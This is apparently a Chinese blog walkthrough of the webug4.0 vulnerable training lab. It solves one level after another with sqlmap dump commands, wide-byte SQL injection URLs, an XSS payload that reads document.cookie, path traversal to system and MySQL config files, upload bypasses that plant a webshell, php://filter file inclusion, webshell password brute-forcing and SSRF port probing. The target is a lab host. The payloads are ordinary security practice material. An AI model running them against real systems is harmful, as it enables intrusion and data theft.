webug4.0 后面持续更新

前三关简单测试了一下,感觉很简单就直接用sqlmap跑了
第四关:post注入
打开网站
在这里插入图片描述在搜索框中输入‘,之后报错
在这里插入图片描述用bp抓包之后保存在本地
在这里插入图片描述
直接用sqlmap跑,跑数据库
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 --dbs --batch
在这里插入图片描述 表名
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug --tables --batch
在这里插入图片描述
字段名
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug -T flag --columns --batch
在这里插入图片描述

sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug -T flag -C flag --dump --batch
第五关
和第四关差不多直接用sqlmap跑就行
第六关:宽字节注入
在这里插入图片描述由于是款字节注入
打一个%df试试
在这里插入图片描述
发现存在注入点,可以手工注入
1、判断列数:
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 1%23
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 2%23
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 3%23
order by 3 时报错,说明只有两列。
2、库名:
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2 union select 1,database()%23

3、表名:
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2
union select ,1,group_concat(table_name)
from information_schema.tables
where table_schema=database()%23
4.字段
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2 union select 1,group_concat(column_name)
from information_schema.columns
where table_name=webug and table_schema=database()%23
sqlmap:
数据库
sqlmap -u http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 --dbs
在这里插入图片描述表:
sqlmap -u http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 -D webug --tables
在这里插入图片描述后面就是重复步骤了
第7关
在这里插入图片描述输入admin之后发现
在这里插入图片描述查看服务版本

<?xml version="1.0"?>

]>

&content;

在这里插入图片描述在这里插入图片描述测量半天找不到其他的,查看源码发现有一个payload,然后解压之后发现在d盘有一个1.txt,但是我没有d盘,直接在c盘下面建立一个1.txt
在这里插入图片描述直接写入xxe代码爆出flag

<?xml version="1.0"?>

]>

&content;

第9关 反射xss
最好不要在谷歌浏览器里面加载,它有自己检测。
这关没有过滤,构造就可以了

第13关 过滤xss
构造语句,发现被过滤了
在这里插入图片描述试了大小写,也是一样被过滤了
然后试<img src=1 οnerrοr=alert(document.cookie)>这个一下就爆出flag
第14关 链接注入
看题目是链接注入
直接构造<a%20href=“https://www.baidu.com”>asads试试
发现可以跳转的百度
第15关

在这里插入图片描述可以抓包看路径,也可以在页面审查看路径,我是抓包
在这里插入图片描述然后
修改路径,下载其他的比如boot.ini
?file=…/boot.ini
在这里插入图片描述第16关
和上关差不多,构造语句下载mysql配置文件
在这里插入图片描述第17关 文件上传(前端拦截)
在这里插入图片描述上传一个.php文件马上就拦截
在这里插入图片描述1,修改前端代码绕过
2,burp抓包改包
在这里插入图片描述
为了简单直接写一句话,在这里插入图片描述
上蚁剑
在这里插入图片描述在里面找flag就可以了

第18关 文件上传(解析漏洞)
首先设置一下版本
在这里插入图片描述
然后访问

在这里插入图片描述
解释一下该解析漏洞,php配置文件中有一个关键选项cgi.fi:x_pathinfo这个选项在某些版本默认是开启的,当访问不存在的文件时,php会向前递归解析
抓包写入木马上传,可以修改后缀名,直接是jpg
在这里插入图片描述访问该文件不存在的php
在这里插入图片描述第二种可以用中文绕过
在这里插入图片描述
访问该路径
在这里插入图片描述第19关 文件上传(畸形文件)
在这里插入图片描述
测试了一下大小写,%00截断等绕过,
当测试双写的时候可以
在这里插入图片描述
第20关 文件上传(截断上传)

这关是截断,首先想到的是%00截断,但是试了很久,发现很奇怪,看了一下源码
在这里插入图片描述
最后突然想到了中文绕过,试了一下居然可以
在这里插入图片描述
第21关 文件上传(htaccess)
打开之后还是一个上传文件的界面
在这里插入图片描述
这关估计是作者搞错了,正常的图片都不能上传上去,而且还禁用了htaccess这个后缀名,为了能做这关修改了一下源码
在这里插入图片描述然后还将黑名单中的.htaccess去掉
传一个正常的文件试试
在这里插入图片描述由于是考的htaccess,所以可以直接上传一个空的jpg文件在添加内容,修改文件名在这里插入图片描述
上传一个qw文件
在这里插入图片描述
然后直接访问该文件的就可以直接访问qw就可以
在这里插入图片描述
第22关 越权修改密码

在这里插入图片描述
登陆进去之后是一个修改密码界面
在这里插入图片描述有一个id=1,为了演示
在这里插入图片描述然后修改id=2
在这里插入图片描述成功越权修改
在这里插入图片描述第23关 支付漏洞
在这里插入图片描述
抓包改价格
在这里插入图片描述
在这里插入图片描述第24 邮箱轰炸

第25 越权查看admin
在这里插入图片描述登陆进去是一个
在这里插入图片描述修改id的值将id改成2
在这里插入图片描述第26关 URL跳转
在这里插入图片描述右上角有一个按钮点击可以跳转
在这里插入图片描述F12之后可以看到一个url链接
在这里插入图片描述

第27关 文件包含

在这里插入图片描述http://192.168.59.128/control/more/file_include.php?filename=php://filter/convert.base64-encode/resource=…/…/index.php
在这里插入图片描述解码就可以看到index.php源码了
在这里插入图片描述第29 webshell爆破
在这里插入图片描述有些时候,有些黑客已经入侵了某网站,然后在该网站留下了后门,我们可以通过网站目录扫描得到该网站后门地址,由于不知道该密码所以需要爆破
抓包
在这里插入图片描述加载字典
在这里插入图片描述跑出来了密码是a1
在这里插入图片描述登陆进去之后就是如下界面,搭上了一个顺风车直接拿shell
在这里插入图片描述

第30关 ssrf
在这里插入图片描述查看win的基本配置文件
在这里插入图片描述查看系统版本
在这里插入图片描述
直接使用http://192.168.59.128/control/more/ssrf.php?url=http://192.168.59.128:22来探测22端口是否开放

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值